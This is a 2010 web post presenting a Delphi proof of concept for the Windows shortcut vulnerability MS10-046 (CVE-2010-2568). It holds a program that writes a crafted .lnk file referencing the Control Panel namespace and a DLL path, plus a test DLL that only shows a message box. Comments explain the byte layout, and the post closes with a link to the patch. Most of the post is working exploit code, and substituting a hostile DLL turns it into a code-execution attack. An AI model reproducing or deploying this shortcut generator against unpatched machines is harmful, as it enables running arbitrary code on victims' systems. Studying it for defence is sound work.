[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx

Post date: Dec 9, 2010 11:16:24 PM

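This page presents a Delphi proof of concept for MS10-046 (CVE-2010-2568), the Windows shortcut (.lnk) vulnerability also called the 'CPL Lnk Exploit'. It has two parts: a program that writes a crafted .lnk file, and a test DLL whose only action is to show a message box.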

Cpl Lnk Vulnerability - MS10-046 in Delphi

Author: - Paray_Vx -

Tested and working on Windows XP, Windows Vista and Windows 7

program MS10046;

uses

SysUtils,

Windows;

// Writes a fixed, crafted shortcut file to `location`.
//
// The output is always 169 bytes: the 141 bytes of ShellCode followed by the
// 28 bytes of Dllx, written in that order. Nothing is computed at run time;
// both tables are emitted exactly as declared.
//
// Parameters:
//   location - path of the file to create. Rewrite truncates an existing file.
//
// Error handling: there is no try/finally and no IOResult check. With I/O
// checking enabled ({$I+}, the Delphi default) a failed open or write raises
// an exception, and CloseFile is then never reached.
//
// Defensive note: a .lnk whose item-ID list names the Control Panel shell
// folder and is followed by a path to an arbitrary DLL is the pattern that
// MS10-046 (CVE-2010-2568) addresses. Patched systems are not affected.
procedure CplLnkExploit(location:string);

const

// NOTE(review): despite the name, ShellCode holds no executable code. It is
// file-format data. The first 20 bytes are the Shell Link header size ($4C)
// and the link class ID 00021401-0000-0000-C000-000000000046. The flags word
// that follows ($81) has the "has ID list" and "Unicode" bits set.
// The second row carries two item IDs whose GUIDs are
// {20D04FE0-3AEA-1069-A2D8-08002B30309D} (My Computer) and
// {21EC2020-3AEA-1069-A2DD-08002B30309D} (Control Panel).

Sizelnk :integer = 141;

ShellCode : ARRAY [1..141] OF Byte = (

$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);

// DLL path referenced by the shortcut, as shipped: 'C:\MS10046.dll'.
// Each character is stored here as ($00, char). The leading $00 pairs with
// the $3A that ends ShellCode, so the two tables form one continuous run of
// 16-bit characters in the output file. The file ends with the final $6C;
// no terminator or padding is written after it.

SizeNameDll : integer = 28;

Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);

var

// Untyped file handle for the output shortcut.
one : file;

// Index into ShellCode and then into Dllx.
i : integer;

begin

AssignFile(one,location);

// Record size 1: every BlockWrite count below is a count of bytes.
Rewrite(one,1);

// Emit the header and item-ID data one byte at a time.
for i:=1 to Sizelnk do

begin

BlockWrite(one,ShellCode[i],1);

end;

// Append the path bytes directly after it.
for i:=1 to SizeNameDll do

begin

BlockWrite(one,Dllx[i],1);

end;

CloseFile(one);

end;

// Program entry point: shows a notice, then writes the crafted shortcut to a
// fixed path on drive C:.
const
  DialogTitle   = 'MS10-046';
  OutputLnkPath = 'C:\MS10-046.lnk';

begin
  // The dialog appears before the file is written, so "Built!" is reported
  // whether or not the write below succeeds.
  MessageBoxA(0, 'CPL Lnk Exploit Built!', DialogTitle, MB_OK);

  // The author's original note here read "Extract here". It presumably marks
  // where the companion DLL was meant to be put in place; no such code exists.
  CplLnkExploit(OutputLnkPath);
end.

// Companion test DLL. This is a separate source file from the program above.
// It contains no exports. Its only action is the message box in the library
// initialization block, which makes a successful load visible.
library MS10046;

uses
  Windows;

begin
  // Library initialization code: runs when the DLL is loaded into a process.
  MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.

Many PCs are still unpatched and vulnerable to this exploit. To protect yourself, install the MS10-046 security update for your OS from the Microsoft bulletin:

http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx

Read more about the CPL Lnk vulnerability (MS10-046, CVE-2010-2568) here:

http://www.computersecurityarticles.info/antivirus/microsoft-lnk-vulnerability-brief-technical-analysiscve-2010-2568/